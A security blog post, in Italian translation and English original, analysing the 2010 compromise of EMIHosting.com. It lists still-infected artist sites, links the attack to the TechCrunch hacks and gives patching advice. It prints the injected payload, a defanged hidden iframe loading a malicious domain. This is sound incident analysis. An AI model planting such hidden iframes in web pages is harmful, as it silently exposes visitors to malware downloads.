Il post seguente è stato tradotto per gentile concessione di Unmask Parasites .

EMI Music è una delle aziende leader della musica nel mondo, con molte etichette discografiche di successo e annovera artisti popolari quali Beatles, Depeche Mode, Gorillaz, Iron Maiden, Kylie Minogue, Pink Floyd, Queen, Snoop Dogg e molti altri. Hanno come hosting web EMIHosting.com, che fornisce spazio web per i siti di EMI e molti siti ufficiali degli artisti.

All’inizio di settembre EMI Hosting.com è stato attaccato da alcuni hacker. Più di un centinaio di siti web su un server con indirizzo IP 195 .225 .83 .57 sono stati infettati con un iframe dannoso. La pagina di diagnostica di Google per AS34401 (EMIMUSICGROUP) recita:

Tra i 279 siti testati in questa rete negli ultimi 90 giorni, 112, inclusi, ad esempio, richardhawleyforum.co.uk/, emirecords.co.uk/, emimusic.co.uk/; fornivano contenuti che permettevano di scaricare e installare software dannoso senza il consenso dell’utente.

Tra gli altri domini infetti possiamo notare (tutti i link puntano alle pagine di diagnostica di Google ) EMI Classics, Virgin Classics oltre a i siti ufficiali di Pink Floyd, David Gilmour, Gorillaz, Massive Attack, Coldplay, Brian Ferry.

La maggior parte sono già stati ripuliti e sbloccati da Google. Comunque alcuni siti rimangono nella blacklist ( i loro proprietari non hanno richiesto un’analisi del malware), ad esempio, i siti di Kate Bush e l’ album di Ray Charles “Genius loves company” .

Ancora infetti

Almeno15 siti che ho verificato contengono ancora iframe dannosi, in tutte le pagine o in alcune sezioni dei siti. Il 25 settembre 2010, i siti seguenti erano ancora pericolosi per la navigazione ( i link puntano ai report in tempo reale di Unmask Parasites ):

1. Queen+Paul Rogers
2. Queen Rock Montreal
3. The Chemical Brothers
4. Spice Girls Greatest Hits
5. Nick Cave and the Bad Seeds
6. The Kooks
7. Starsailor
8. The Good, The Bad And The Queen,
9. Sonny J
10. Jamie T
11. Simon Webbe
12. ebtg
13. NowMusic Forums
14. BuZzIn ‘ fLy RecOrDs
15. EMI Classics UK

Codice dannoso

Tutti i siti infetti contengono questo iframe nascosto proveniente da “hxxp://virtuellvorun .org/zl/s2”

e tutte le pagine di diagnostica di Google riportano il dominio “virtuellvorun .org” come causa principale del problema.

L’ attuale codice HTML iniettato è:

<div style="visibility:hidden"><ifr ame src="hxxp://virtuellvorun .org/zl/s2" width=100 height=80></ifram e></div>

Può essere trovato in sezioni differenti nel codice delle pagine web.

Lo stesso attacco ha colpito TechCrunch?

Un’ informazione ancora più interessante è presente nella maggioranza dei siti web: il codice dannoso è stato individuato inizialmente il 5 e il 6 settembre . Questo, probabilmente, è il periodo in cui è avvenuto l’attacco. Secondo il servizio di Google Safe Browsing, lo stesso dominio “virtuellvorun .org” si è rivelato la fonte dell’infezione per i siti violati di TechCrunch (MobileCrunch, CrunchGear, TechCrunch Europe ) esattamente nello stesso periodo di tempo ( 6 settembre ).

Speculazioni sullo scenario di attacco

Ecco cosa penso potrebbe essere accaduto. Intorno al 5 settembre, gli hacker hanno utilizzato una falla di sicurezza in uno dei siti ospitati da EMI (molti di loro usano vecchie versioni di phpBB e WordPress) per caricare alcuni script backdoor e/o shell web.

Successivamente hanno usato gli script caricati per trovare siti con permessi sui file deboli e li hanno infettati. Poi gli amministratori di EMI hosting hanno rilevato la violazione e hanno cercato di ripulire i siti infetti. Purtroppo non hanno eseguito analisi a livello server e hanno omesso alcuni siti che contenevano injection pericolose.

Spero che questo articolo aiuterà EMI Hosting a trovare e ripulire i siti ancora infetti, che prendano in considerazione il rafforzamento dei loro server e raffinino le loro policy di sicurezza per impedire violazioni future a livello server; dopo tutto ospitano siti molto popolari e simili attacchi hacker espongono molti appassionati di musica al malware.

Ai navigatori

Come è possibile vedere, anche siti di notevoli dimensioni e con una grossa reputazione sono in grado di diffondere malware. Dovreste essere preparati al fatto che ogni sito web che visitate possa cercare di installare furtivamente qualcosa di dannoso sul computer. Per ridurre al minimo i rischi di infezione, il vostro sistema (sistema operativo, browser, i plugin, Flash, Java, Adobe Reader, ecc… ) dovrebbe essere sempre aggiornato con tutte le patch. Inoltre, vi suggerisco di usare NoScript su Firefox: questa estensione, altamente personalizzabile, blocca efficacemente qualsiasi contenuto che venga attivato da siti non attendibili; in questo caso particolare, il browser semplicemente ignorerà gli iframe dannosi.

Dite la vostra

Siete a conoscenza di alcuni dettagli in merito alle violazioni di EMI/TechCrunch? Cosa ne pensate? I vostri commenti sono i benvenuti.

Fonte: EMI Server Hacked

EMI Music is one of the world’s leading music companies with many successful record labels and signed popular artists that include The Beatles, Depeche Mode, Gorillaz, Iron Maiden, Kylie Minogue, Pink Floyd, Queen, Snoop Dogg and many more. They have their own web hosting subsidiary EMIHosting.com that provides web space for EMI’s websites and many official websites of EMI artists.

In the beginning of this September EMI Hositng.com was attacked by hackers. As a result more than a hundred websites on a server with IP address of 195 .225 .83 .57 have been infected with a malicious iframe. Google’s diagnostics page for AS34401 (EMIMUSICGROUP) says:

Of the 279 site(s) we tested on this network over the past 90 days, 112 site(s), including, for example, richardhawleyforum.co.uk, emirecords.co.uk, emimusic.co.uk, served content that resulted in malicious software being downloaded and installed without user consent.

Among other infected domains, we can see (all links point to Google’s diagnostic pages) EMI Classics, Virgin Classics as well as official sites of Pink Floyd, David Gilmour, Gorillaz, Massive Attack, Coldplay, Brian Ferry. Most of them have been already cleaned up and unblocked by Google. However, some sites remain blacklisted (their owners didn’t request malware review), for example, sites of Kate Bush and Ray Charles’ “Genius loves company” album.

Still infected

At least 15 sites that I checked myself still contain malicious iframes in either all webpages or in certain sections of websites. As of September 25th 2010, the following sites are still dangerous for web surfers (links point to real-time Unmask Parasites reports):

1. Queen+Paul Rogers
2. Queen Rock Montreal
3. The Chemical Brothers
4. Spice Girls Greatest Hits
5. Nick Cave and the Bad Seeds
6. The Kooks
7. Starsailor
8. The Good, The Bad And The Queen,
9. Sonny J
10. Jamie T
11. Simon Webbe
12. ebtg
13. NowMusic Forums
14. BuZzIn ‘ fLy RecOrDs
15. EMI Classics UK

Malicious code

Note that all infected sites have this hidden iframe from “hxxp://virtuellvorun .org/zl/s2”

and all Google diagnostic pages report the “virtuellvorun .org” domain as the source of the problem.

The actual injected HTML code is

<div style="visibility:hidden"><ifr ame src="hxxp://virtuellvorun .org/zl/s2" width=100 height=80></ifram e></div>

it can be found in different parts of web page code.

The same attack hit TechCrunch?

One more interesting observation is on most websites, the malicious code had been initially detected on September 5th and 6th. This is probably when the attack took place. According to Google’s Safe Browsing service, the same “virtuellvorun .org” domain was the source of infection for hacked TechCrunch sites (MobileCrunch, CrunchGear, TechCrunch Europe) exactly in the same period of time (September 6th).

Speculations on the attack scenario

Here’s what I think could happen. Around September 5th, hackers used a security hole in one of EMI hosted sites (many of them use old versions of phpBB and WordPress) to upload some backdoor scripts and/or web shells. Then they used the uploaded scripts to find more sites with weak file permissions and infect them. Then EMI hosting admins detected the hack and tried to clean up the infected sites. Unfortunately, they didn’t try to run server-wide scans and missed quite a few sites with malicious injections.

I hope this article will help EMI Hosting find and clean up those still infected sites and consider hardening their servers and refining their security policy to prevent future server-wide hacks — after all they host quite popular sites and such hacker attacks expose a lot of music fans to malware.

To web surfers

As you can see, even big reputable sites can distribute malware. You should be prepared that any website you visits tries to silently install something malicious on your computer. To minimize risks of such infection you should have your system (OS, browser, plugins, Flash, Java, Adobe Reader, etc) up-to-date and fully patched. Moreover, I suggest that you use NoScript on Firefox — this highly customizable extension effectively blocks any active content from untrusted locations — in this particular case your browser would simply ignore that malicious iframe.

Have your say

Do you know any details about those EMI/TechCrunch hacks? What do you think about them? Your comments are welcome.

Source: EMI Server Hacked